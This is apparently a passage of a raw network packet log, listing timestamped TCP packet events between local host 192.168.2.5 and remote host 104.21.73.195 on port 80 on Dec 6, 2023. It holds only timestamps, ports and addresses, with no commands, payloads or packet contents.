                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881752014 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881763935 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881793022 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881865978 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881897926 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881910086 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881938934 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881939888 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881952047 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881974936 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.881998062 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882002115 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882029057 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882050991 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882060051 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882106066 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882117987 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882128954 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882141113 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882148981 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882162094 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882178068 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882216930 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882222891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882235050 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882246971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882257938 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882275105 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882292986 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882296085 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882327080 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882356882 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882411003 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882411957 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882422924 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882457972 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882468939 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882528067 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882534981 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882570028 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882606983 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882626057 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882771015 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882783890 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882796049 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882807016 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882810116 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882817984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882844925 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882847071 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882879972 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882880926 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882894039 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882905006 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882925987 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882944107 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.882966995 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883009911 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883053064 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883084059 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883136034 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883161068 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883167982 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883174896 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883191109 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883224010 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883302927 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883320093 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883363008 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883419991 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883466959 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883506060 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883510113 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883522034 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883568048 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883570910 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883594036 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883629084 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883650064 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883671045 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883708000 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883714914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883737087 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883765936 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883766890 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883789062 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883816957 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883840084 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883851051 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883862019 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883882999 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883883953 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883915901 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883934975 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.883969069 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884004116 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884013891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884026051 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884047985 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884059906 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884206057 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884217978 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884242058 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884274960 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884308100 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884368896 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884418964 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884455919 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884478092 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884550095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884562016 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884584904 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884598017 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884598970 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884610891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884623051 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884648085 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884654999 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884675980 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884707928 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884711981 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884730101 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884742975 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884763956 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884767056 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884804964 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884815931 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884829044 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884839058 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884850979 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884865046 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884882927 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884887934 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884929895 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884943008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884963036 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884975910 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.884994984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885032892 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885051966 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885063887 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885097980 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885116100 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885166883 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885179043 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885200024 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885302067 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885314941 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885363102 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885376930 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885411024 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885437965 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885500908 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885513067 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885534048 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885565996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885586023 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885607004 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885627985 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885651112 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885662079 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885680914 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885691881 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885720015 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885740042 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885751963 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885780096 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885792971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885804892 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885834932 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885896921 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885909081 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885934114 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885955095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.885994911 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886012077 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886030912 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886034012 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886058092 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886069059 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886107922 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886136055 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886141062 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886174917 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886244059 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886256933 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886286974 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886348963 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886387110 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886399031 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886418104 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886522055 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886537075 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886555910 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886567116 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886568069 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886576891 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886600971 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886605978 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886637926 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886688948 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886718988 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886719942 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886754036 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886754036 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886780024 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886814117 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886852026 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886861086 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.886979103 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887016058 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887032032 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887043953 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887065887 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887079954 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887087107 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887109041 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887125969 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887150049 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887187004 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887211084 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887370110 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887382984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887408972 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887418985 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887454987 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887506008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887597084 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887609005 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887629986 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887661934 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887698889 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887768030 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887814045 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887847900 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887847900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887885094 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887921095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887921095 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887957096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887969971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.887989044 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888010025 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888022900 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888042927 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888055086 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888067007 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888087988 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888119936 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888153076 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888159990 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888215065 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888250113 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888268948 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888292074 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888326883 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888430119 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888442039 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888453007 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888475895 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888484001 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888516903 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.888525009 CET8049706104.21.73.195192.168.2.5
